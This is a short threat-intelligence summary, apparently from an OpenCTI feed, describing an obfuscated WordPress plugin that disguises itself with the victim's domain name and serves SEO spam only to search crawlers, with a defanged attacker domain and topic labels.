Fake Spam Plugin Uses Victim's Domain Name to Evade Detection

SUMMARY :

A sophisticated SEO spam infection was discovered utilizing a cleverly crafted plugin that mimics the infected domain's name to avoid detection. The malware injects spam content into websites, targeting search engine rankings, and only activates under specific conditions like when a crawler is detected. The plugin's code is heavily obfuscated, using thousands of variable assignments broken into small parts. When decoded, the malware downloads files from external hosts, fetches remote content, and delivers custom spam to search engines while appearing normal to regular users. The attacker's domain, mag1cw0rld[.]com, is used for remote control. This technique allows the spam to remain undetected for longer periods, making it challenging to identify with traditional tools.

OPENCTI LABELS :

obfuscation,wordpress,remote control,evasion techniques,search engine manipulation,code injection,stealth malware,seo spam,plugin disguise


Open in NetmanageIT OpenCTI Public Instance with below link!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Fake Spam Plugin Uses Victim's Domain Name to Evade Detection